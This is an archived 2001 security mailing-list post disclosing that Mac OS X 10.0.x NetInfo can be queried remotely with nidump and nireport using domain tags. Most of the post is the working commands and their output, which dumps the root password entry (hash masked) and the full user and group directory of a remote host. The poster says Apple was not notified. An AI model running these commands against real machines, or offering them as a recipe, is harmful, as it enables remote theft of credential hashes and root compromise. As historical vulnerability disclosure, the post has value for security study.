OSX remote root

From: dotslashat_private
Date: Wed Oct 17 2001 - 23:56:10 PDT


    I have seen mention of nidump being used locally on an OSX box to take
    root... I have found that, with the use of "tags", it is also a remote
    root. I have not notified Apple because they did nothing about the
    original local exploit. Any machine with a "network" nidomain is
    vulnerable. It may also be possible to spoof a connection to the "local"
    domain; however, I have not tested this.
    -KF
    
    bugtraq id	2953
    object	nidump
    class	Design Error
    cve	CVE-MAP-NOMATCH
    remote	No
    local	Yes
    published	Jun 26, 2001
    updated	Sep 04, 2001
    vulnerable	Apple MacOS X 10.0
    Apple MacOS X 10.0.1
    Apple MacOS X 10.0.2
    Apple MacOS X 10.0.3
    Apple MacOS X 10.0.4
    
    the above needs to be updated to "remote: Yes"
    
    [dhcpxxx:~] elguapo% nidomain -l xxx.xxx.net
    tag=network udp=797 tcp=798
    tag=local udp=795 tcp=796
    
    [dhcpxxxxxx:~] elguapo% nidump -t xxx.xxx.net/network passwd
    root:xxxxxxxx.:0:0::0:0:System Administrator:/private/var/root:/bin/tcsh
    
    [dhcpxxx:~] elguapo% nireport -t xxx.xxx.net/network /users name uid
    passwd
    root    0       xxxxxxxxx.
    
    [dhcpxxxx:~] elguapo% nidump -r / -t xxx.xxxx.net/network
    {
         "master" = ( "localhost/network" );
         CHILDREN = (
           {
             "name" = ( "machines" );
             CHILDREN = (
               {
                 "name" = ( "localhost" );
                 "ip_address" = ( "xxx.xxx.xxx.xxx" );
                 "serves" = ( "./network", "localhost/local" );
               }
             )
           },
           {
             "name" = ( "users" );
             CHILDREN = (
               {
                 "name" = ( "root" );
                 "passwd" = ( "xxxxxxxxx." );
                 "uid" = ( "0" );
                 "gid" = ( "0" );
                 "change" = ( "0" );
                 "expire" = ( "0" );
                 "realname" = ( "System Administrator" );
                 "home" = ( "/private/var/root" );
                 "shell" = ( "/bin/tcsh" );
               }
             )
           },
           {
             "name" = ( "groups" );
             CHILDREN = (
               {
                 "name" = ( "nobody" );
                 "gid" = ( "-2" );
                 "passwd" = ( "*" );
               },
               {
                 "name" = ( "nogroup" );
                 "gid" = ( "-1" );
                 "passwd" = ( "*" );
               },
               {
                 "passwd" = ( "*" );
                 "name" = ( "wheel" );
                 "gid" = ( "0" );
                 "users" = ( "xxxxx" );
               },
               {
                 "name" = ( "daemon" );
                 "gid" = ( "1" );
                 "passwd" = ( "*" );
                 "users" = ( "root" );
               },
               {
                 "name" = ( "kmem" );
                 "gid" = ( "2" );
                 "passwd" = ( "*" );
                 "users" = ( "root" );
               },
               {
                 "name" = ( "sys" );
                 "gid" = ( "3" );
                 "passwd" = ( "*" );
                 "users" = ( "root" );
               },
               {
                 "name" = ( "tty" );
                 "gid" = ( "4" );
                 "passwd" = ( "*" );
                 "users" = ( "root" );
               },
               {
                 "name" = ( "operator" );
                 "gid" = ( "5" );
                 "passwd" = ( "*" );
                 "users" = ( "root" );
               },
               {
                 "name" = ( "mail" );
                 "gid" = ( "6" );
                 "passwd" = ( "*" );
               },
               {
                 "name" = ( "bin" );
                 "gid" = ( "7" );
                 "passwd" = ( "*" );
               },
               {
                 "name" = ( "staff" );
                 "gid" = ( "20" );
                 "passwd" = ( "*" );
                 "users" = ( "root" );
               },
               {
                 "name" = ( "guest" );
                 "gid" = ( "31" );
                 "passwd" = ( "*" );
                 "users" = ( "root" );
               },
               {
                 "name" = ( "utmp" );
                 "gid" = ( "45" );
                 "passwd" = ( "*" );
               },
               {
                 "name" = ( "uucp" );
                 "gid" = ( "66" );
                 "passwd" = ( "*" );
               },
               {
                 "name" = ( "dialer" );
                 "gid" = ( "68" );
                 "passwd" = ( "*" );
               },
               {
                 "name" = ( "network" );
                 "gid" = ( "69" );
                 "passwd" = ( "*" );
               },
               {
                 "name" = ( "www" );
                 "gid" = ( "70" );
                 "passwd" = ( "*" );
               },
               {
                 "passwd" = ( "*" );
                 "name" = ( "admin" );
                 "gid" = ( "80" );
                 "users" = ( "xxxxxx" );
               },
               {
                 "name" = ( "unknown" );
                 "gid" = ( "99" );
                 "passwd" = ( "*" );
               }
             )
           },
           {
             "name" = ( "aliases" );
           },
           {
             "name" = ( "fax_modems" );
           },
           {
             "name" = ( "mounts" );
           },
           {
             "name" = ( "printers" );
           }
         )
    }
    


